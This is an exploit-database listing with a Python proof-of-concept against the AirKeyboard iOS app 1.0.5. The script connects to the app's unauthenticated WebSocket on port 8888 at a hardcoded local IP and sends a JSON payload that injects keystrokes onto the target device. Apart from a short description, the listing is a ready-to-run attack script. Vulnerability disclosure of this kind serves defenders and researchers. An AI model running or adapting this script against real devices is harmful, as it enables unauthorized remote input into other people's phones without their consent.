AirKeyboard iOS App 1.0.5 Remote Input Injection

2025.06.15
Credit: Chokri Hammedi
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: AirKeyboard iOS App 1.0.5 - Remote Input Injection # Date: 2025-06-13 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://airkeyboardapp.com # Software Link: https://apps.apple.com/us/app/air-keyboard/id6463187929 # Version: Version 1.0.5 # Tested on: iOS 18.5 with AirKeyboard app ''' Description: The AirKeyboard iOS application exposes a WebSocket server on port 8888 which accepts arbitrary input injection messages from any client. No authentication or pairing process is required. This allows any attacker to type arbitrary keystrokes directly into the victim’s iOS device in real-time without user interaction, resulting in full remote input control. ''' import websocket import json import time target_ip = "192.168.8.101" ws_url = f"ws://{target_ip}:8888" text = "i'm hacker i can write on your keyboard :)" keystroke_payload = { "type": 1, "text": f"{text}", "mode": 0, "shiftKey": True, "selectionStart": 1, "selectionEnd": 1 } def send_payload(ws): print("[+] Sending remote keystroke...") ws.send(json.dumps(keystroke_payload)) time.sleep(1) ws.close() def on_open(ws): send_payload(ws) def on_error(ws, error): print(f"[!] Error: {error}") def on_close(ws, close_status_code, close_msg): print("[*] Connection closed") def exploit(): print(f"[+] Connecting to AirKeyboard WebSocket on {target_ip}:8888") ws = websocket.WebSocketApp(ws_url, on_open=on_open, on_error=on_error, on_close=on_close) ws.run_forever() if __name__ == "__main__": exploit()


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2025, cxsecurity.com

 

Back to Top